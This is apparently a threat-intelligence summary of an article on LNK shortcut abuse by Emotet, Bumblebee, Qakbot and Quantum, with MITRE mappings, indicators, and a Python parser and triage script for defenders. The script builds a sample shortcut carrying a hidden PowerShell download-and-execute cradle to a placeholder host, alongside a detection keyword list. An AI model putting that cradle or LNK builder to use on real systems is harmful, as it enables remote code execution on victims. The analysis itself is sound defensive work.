How LNK Files Are Abused by Threat Actors

LNK (Shell Link) files are Windows shortcuts that threat actors increasingly abuse to execute binaries and stage attacks, including delivering payloads via PowerShell, VBScript, or MSHTA. The article explains the LNK file format, how attackers leverage it in stages (delivery, downloader, and loader), and how defenders can analyze and detect malicious LNKs using open-source tools like LnkParse3. #Bumblebee #Quantum #Emotet #Qakbot

Keypoints

  • The LNK file format comprises five structures (ShellLinkHeader, LINKTARGET_IDLIST, LINKINFO, STRING_DATA, EXTRA_DATA); only the header is mandatory, and the LinkFlags field in it declares which optional structures follow, so a mismatch between the flags and the rest of the file is itself a sign of a hand-crafted or tampered shortcut.
  • Shell Link structures expose fields that can reveal suspicious activity, such as the HasRelativePath and HasArguments link flags, FileAttributes, and the creation/access/write FILETIMEs, which also give incident responders timeline context.
  • LNK files can execute a target with arguments, enabling attackers to run PowerShell, VBScript, or MSHTA, or to invoke commands from accompanying dropped files.
  • Threat actors use LNKs primarily in the delivery stage to deploy or execute malware, including as downloaders that fetch subsequent payloads.
  • Examples include Emotet delivering LNKs via phishing with password-protected archives and Bumblebee using LNKs to load payloads in two variants (ISO with DLL and PowerShell with a second stage).
  • Quantum has a tool to generate malicious LNKs with capabilities like UAC bypass, delayed execution, post-execution hiding, and double extensions, highlighting evolving LNK-based abuse.
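The keypoints above describe the structures an analyst reads first (ShellLinkHeader, LinkFlags, STRING_DATA with the target and its arguments, and the TrackerDataBlock in EXTRA_DATA that carries the originating machine's name and MAC address). The following parser, added here as an example and not code from the original article or from Intezer, walks those structures in the order MS-SHLLINK lays them out and applies a few triage heuristics. The sample LNK it parses is constructed in `build_sample_lnk()` (machine name, GUIDs and the `example.invalid` URL are placeholders, not indicators from any real sample); it is not a malware artefact.

```python
"""Minimal MS-SHLLINK parser: header, LinkFlags, STRING_DATA, TrackerDataBlock.
Added example; sample bytes below are constructed, not taken from real malware."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
LINK_FLAGS = {  # LinkFlags bits this parser needs (MS-SHLLINK 2.1.1)
    0x01: "HasLinkTargetIDList", 0x02: "HasLinkInfo", 0x04: "HasName",
    0x08: "HasRelativePath", 0x10: "HasWorkingDir", 0x20: "HasArguments",
    0x40: "HasIconLocation", 0x80: "IsUnicode",
}
# STRING_DATA fields appear in this fixed order, each only if its flag is set
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
TRACKER_SIGNATURE = 0xA0000003  # EXTRA_DATA TrackerDataBlock
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}
LOLBIN_HOSTS = ("powershell", "pwsh", "mshta", "wscript", "cscript", "cmd", "rundll32", "regsvr32")


def filetime_to_datetime(ft):
    """FILETIME = 100ns ticks since 1601-01-01 UTC; 0 means 'not set'."""
    if ft == 0:
        return None
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_lnk(data):
    hdr_size, clsid, flags, attrs, ctime, atime, wtime, fsize, _icon, show = \
        struct.unpack_from("<I16sIIQQQIII", data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    info = {
        "link_flags": [n for b, n in LINK_FLAGS.items() if flags & b],
        "file_attributes": attrs, "file_size": fsize,
        "show_command": SHOW_COMMANDS.get(show, hex(show)),
        "creation_time": filetime_to_datetime(ctime),
        "access_time": filetime_to_datetime(atime),
        "write_time": filetime_to_datetime(wtime),
    }
    off = hdr_size
    if flags & 0x01:  # LINKTARGET_IDLIST: IDListSize (u16) then the ID list
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & 0x02:  # LINKINFO: LinkInfoSize (u32) covers the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    is_unicode = bool(flags & 0x80)
    for bit, name in STRING_FIELDS:  # STRING_DATA: CountCharacters (u16) + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            width = 2 if is_unicode else 1
            raw = data[off + 2: off + 2 + count * width]
            info[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
            off += 2 + count * width
    while off + 8 <= len(data):  # EXTRA_DATA: blocks end with a BlockSize < 4
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == TRACKER_SIGNATURE:
            block = data[off:off + size]
            info["machine_id"] = block[16:32].split(b"\0")[0].decode("ascii", "replace")
            file_droid = uuid.UUID(bytes_le=block[48:64])  # Droid = VolumeID, then FileID
            if file_droid.version == 1:  # v1 GUIDs carry the creating host's MAC
                info["mac_address"] = ":".join(f"{b:02x}" for b in file_droid.node.to_bytes(6, "big"))
        off += size
    return info


def triage(info):
    """Heuristics a responder applies before running anything."""
    findings = []
    target = (info.get("relative_path") or "").lower()
    host = target.rsplit("\\", 1)[-1]
    host = host[:-4] if host.endswith(".exe") else host
    if host in LOLBIN_HOSTS:
        findings.append(f"target is a script/binary host: {host}")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        findings.append("SW_SHOWMINNOACTIVE: window minimised without focus (hides console)")
    args = info.get("arguments", "")
    for marker in ("http", "downloadstring", "iex", "-enc", "-w hidden", "frombase64string"):
        if marker in args.lower():
            findings.append(f"argument contains '{marker}'")
    if len(args) > 260:
        findings.append(f"unusually long arguments ({len(args)} chars)")
    return findings


def build_sample_lnk():
    """Constructed sample (placeholder names/GUIDs/URL): powershell.exe via a
    relative path, hidden window, a download cradle, and a TrackerDataBlock."""
    flags = 0x08 | 0x10 | 0x20 | 0x80  # HasRelativePath|HasWorkingDir|HasArguments|IsUnicode
    ft_2022 = 132854688000000000  # FILETIME for 2022-01-01T00:00:00Z
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         ft_2022, ft_2022, ft_2022, 0, 0, 7, 0, 0, 0, 0)

    def s(text):  # STRING_DATA entry: CountCharacters + UTF-16LE, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    strings = (s("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")
               + s("C:\\Windows\\System32")
               + s("-w hidden -nop -c \"iex (New-Object Net.WebClient)"
                   ".DownloadString('https://example.invalid/d.png')\""))
    machine = b"DESKTOP-SAMPLE".ljust(16, b"\0")
    volume = uuid.UUID("7f4b1c2e-9d3a-4f6b-8c1d-2e3f4a5b6c7d").bytes_le   # v4: no MAC
    file_id = uuid.UUID("5d9a3a2e-7c4b-11ec-8000-001122334455").bytes_le  # v1: node = MAC
    tracker = (struct.pack("<IIII", 0x60, TRACKER_SIGNATURE, 0x58, 0)
               + machine + volume + file_id + volume + file_id)
    return header + strings + tracker + struct.pack("<I", 0)  # TerminalBlock


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    for key, value in parsed.items():
        print(f"{key}: {value}")
    print("findings:", triage(parsed))
```

Running the script prints the decoded header fields, the relative path to powershell.exe, the hidden-window flag, the arguments with the download cradle, and the machine name and MAC recovered from the TrackerDataBlock; compare that MAC and machine name against the host where the LNK was found to decide whether it was built elsewhere. Non-Unicode strings are decoded as cp1252 here, whereas the real system code page of the authoring machine may differ.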

MITRE Techniques

  • [T1059.001] PowerShell – LNK files are set to execute PowerShell with predefined arguments: “LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments or execute commands from another file that is dropped with the LNK file.”
  • [T1059.005] VBScript – LNK files are set to execute VBScript with predefined arguments: “…LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments…”
  • [T1059.007] MSHTA – LNK files can trigger MSHTA with predefined arguments: “…LNK files are set to execute either PowerShell, VBScript, or MSHTA with pre-defined arguments…”
  • [T1566.001] Phishing: Spearphishing Attachment – Emotet used phishing with a password-protected zip containing an LNK disguised as a Word document that executes a VBS script which downloads malware.
  • [T1105] Ingress Tool Transfer – Qakbot LNK downloads a DLL from a remote location and executes it. “It downloads a DLL from a remote location and executes it.”
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – Quantum’s LNK tooling includes UAC bypass, delayed execution, post-execution hiding, and double extensions. “…such as UAC bypass, delayed execution, post-execution hiding, and a variety of double extensions.”
  • [T1036] Masquerading – The use of double extensions (sub-technique T1036.007, Double File Extension) to hide the file’s true nature. “…a variety of double extensions.”

Indicators of Compromise

  • [URL] context – https://news-wellness[.]com/5MVhfo8BnDub/D.png – used in the Qakbot-related LNK to download a payload from a remote location.
  • [File Path] context – C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, C:\Windows\System32\rundll32.exe – executables commonly invoked by malicious LNKs to run scripts or load DLLs.
  • [MAC Address] context – the MAC address of the machine where the link target was last seen, stored in the TrackerDataBlock of the LNK’s EXTRA_DATA section – compared against the victim host to determine whether the LNK was created elsewhere.

Read more: https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/